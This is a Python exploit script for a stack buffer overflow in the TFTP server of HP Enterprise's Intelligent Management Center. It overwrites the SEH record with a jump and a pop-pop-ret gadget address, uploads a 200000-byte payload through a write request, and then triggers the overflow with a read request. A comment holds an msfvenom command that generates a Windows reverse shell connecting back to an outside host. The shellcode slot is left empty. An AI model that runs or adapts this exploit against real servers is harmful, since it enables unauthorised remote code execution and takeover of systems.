Intelligent Management Center (iMC)
Application Portfolio by HP Enterprise. Exploit by DS.
TFTP Server Stack Buffer Overflow RCE (safeSEH)
import socket
import sys
import math
from struct import pack
pktNum = 0x30  # module-level value; shadowed by the parameter of the same name in makeDp
blksize = b"1024"  # not referenced anywhere in this file; sendRRQ hard-codes b"61439" instead
filename = bytearray(b"test.txt")  # file name placed in both the WRQ and the RRQ
#[*] Exact match at offset 5952
#[*] Exact match at offset 26232
#[*] Exact match at offset 46512
#payload = bytearray([0x41]*(26000))
#payload += b"BBBB"
#payload += bytearray([0x41]*(50000-len(payload)))
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.55 LPORT=4444 -b "\x00" -f python -v shellcode
shellcode = b""  # left empty in this listing; nothing executable is embedded here
pad = bytearray([0x90]*0x488)  # 0x488 single-byte NOPs (0x90) placed before the (empty) shellcode slot
# Payload layout as built below (offsets follow the author's pattern-match notes above):
#   [0, 26236)      filler bytes 0x41
#   [26236, 26240)  next-SEH slot   <- pack("<L", 0x06eb9090)
#   [26240, 26244)  SEH handler slot <- pack("<L", 0x120cd607)
#   then pad, shellcode, and 0x41 filler up to exactly 200000 bytes
# Detection note: on the wire this is a WRQ for "test.txt" followed by 200000 bytes of
# DATA that is almost entirely 0x41, sent in blocks of 0x512 (1298) bytes.
payload = bytearray([0x41]*(26236))
payload += pack("<L", 0x06eb9090) #NSEH jmp 0x06
payload += pack("<L", 0x120cd607) #SEH pop pop ret gadget
payload += pad
payload += shellcode
payload += bytearray([0x41]*(200000-len(payload)))
# Number of DATA blocks sendWRQ will emit: ceil(len(payload) / 0x512) plus one extra block.
payLen = int(math.ceil(len(payload) / 0x512)) + 1
def buildWRQ():
    """Build the TFTP write request (opcode 2) announcing ``filename``.

    Layout: 2-byte opcode, NUL-terminated filename, NUL-terminated mode
    string "OCTET", then the literal "14280" with no terminating NUL.
    Reads the module-level ``filename``.

    Returns:
        bytearray: the WRQ packet.
    """
    # opcode table: 1 RRQ, 2 WRQ, 3 DATA, 4 ACK, 5 ERROR
    wrq_opcode = 0x02
    packet = bytearray((0x00, wrq_opcode))
    packet.extend(filename)
    packet.append(0x00)
    packet.extend(b"OCTET")
    packet.append(0x00)
    # trailing field is deliberately left without a NUL terminator
    packet.extend(b"14280")
    return packet
def sendWRQ(server, port, buf, payload):
    """Send the WRQ in ``buf`` and then stream ``payload`` as TFTP DATA blocks.

    ``payload`` is sliced into 0x512-byte pieces, ``payLen`` of them
    (module-level count), each wrapped by ``makeDp`` with block numbers
    starting at 0.  After every block one datagram is awaited from the
    server before the next is sent; a final empty DATA block ends the
    transfer.  The socket is closed only on the success path; an exception
    from any send/recv leaves it open.

    Args:
        server: target host.
        port: initial TFTP port the WRQ is sent to.
        buf: the WRQ packet.
        payload: bytes to upload.
    """
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.sendto(buf, (server, port))
    print('Connecting...')
    reply = udp.recvfrom(320)
    print('Sending payload...')
    # The server replies from a fresh port; every DATA block goes there.
    data_port = reply[1][1]
    chunk = 0x512
    for block_idx in range(payLen):
        start = block_idx * chunk
        piece = payload[start:start + chunk]
        udp.sendto(makeDp(block_idx, piece), (server, data_port))
        # one reply per block before moving on
        reply = udp.recvfrom(320)
    # zero-length DATA block terminates the transfer
    udp.sendto(makeDp(block_idx + 1, bytearray()), (server, data_port))
    udp.close()
    print("[+] WRQ Packets sent")
#packet 2 DATA
def makeDp(pktNum, buf):
    """Build a TFTP DATA packet (opcode 3).

    The parameter ``pktNum`` shadows the module-level name of the same
    value; only the argument is used here.

    Args:
        pktNum: block number, packed big-endian into 16 bits.
        buf: block payload appended verbatim after the 4-byte header.

    Returns:
        bytes: header followed by ``buf``.

    Raises:
        struct.error: if ``pktNum`` does not fit in 16 bits.
    """
    header = pack(">HH", 0x0003, pktNum)
    return header + bytes(buf)
def buildRRQ(blkSize):
    """Build a TFTP read request (opcode 1) for the module-level ``filename``.

    Layout: 2-byte opcode, NUL-terminated filename, NUL-terminated "OCTET",
    and, when ``blkSize`` is truthy, a NUL-terminated "blksize" option name
    followed by the NUL-terminated option value.

    Args:
        blkSize: raw bytes used verbatim as the blksize option value, or a
            falsy value to omit the option.

    Returns:
        bytearray: the RRQ packet.
    """
    # author's notes: SO during opcode 0x02 - 0x40af2c; call to 0x407730 at
    # 0x40a84e calls fread
    rrq = bytearray(b"\x00\x01")
    rrq += filename
    rrq += b"\x00OCTET\x00"
    if blkSize:
        # The option value is attacker-supplied data handed to the server
        # unchanged; the author observed that values above 61439 make the
        # server's fread report file not found.
        rrq += b"blksize\x00" + blkSize + b"\x00"
    return rrq
def sendRRQ(server, port):
    """Send one RRQ for ``filename`` with a blksize option of 61439.

    The reply is never read and the socket is never closed here; cleanup is
    left to interpreter exit.  On the wire this is a single RRQ datagram
    arriving right after the large WRQ upload.

    Args:
        server: target host.
        port: TFTP port the RRQ is sent to.
    """
    request = buildRRQ(b"61439")
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.sendto(request, (server, port))
    print('Do we have a shell?')
# new_port = resp[1][1]
# blkNum = 0
# ack = buildACK(blkNum)
# s.sendto(ack,(server,new_port))
# resp = s.recvfrom(3)
#buf = buildRRQ(b"61000")
#s.sendto(buf,(server,new_port))
#resp = s.recvfrom(3200)
# while resp:
# blkNum = resp[0][3]
# print(resp)
# ack = buildACK(blkNum)
# s.sendto(ack,(server,new_port))
# resp = s.recvfrom(3)
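def buildACK(blkNum):
    """Build a TFTP ACK packet (opcode 4) for block ``blkNum``.

    The original ``bytearray("\\x00\\x04\\x00")`` raised TypeError at call
    time because a str passed to ``bytearray`` needs an encoding; the header
    is now built from bytes.  The block number is packed as a big-endian
    16-bit field, matching ``makeDp``, so 0..65535 are accepted where the
    original single-byte append only covered 0..255 (identical output in
    that range).

    Args:
        blkNum: block number to acknowledge, 0..65535.

    Returns:
        bytearray: the 4-byte ACK packet.

    Raises:
        struct.error: if ``blkNum`` is outside the 16-bit range.
    """
    return bytearray(pack(">HH", 0x0004, blkNum))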
def main():
    """Entry point: read the target host from argv[1] and talk TFTP on UDP/69.

    Sends the WRQ upload first, then the RRQ.  Raises IndexError when no
    host argument is supplied.
    """
    target = sys.argv[1]
    tftp_port = 69
    sendWRQ(target, tftp_port, buildWRQ(), payload)
    print('Requesting payload read...')
    sendRRQ(target, tftp_port)
if __name__ == "__main__":
    # Script entry point; main() takes the target host from sys.argv[1].
    main()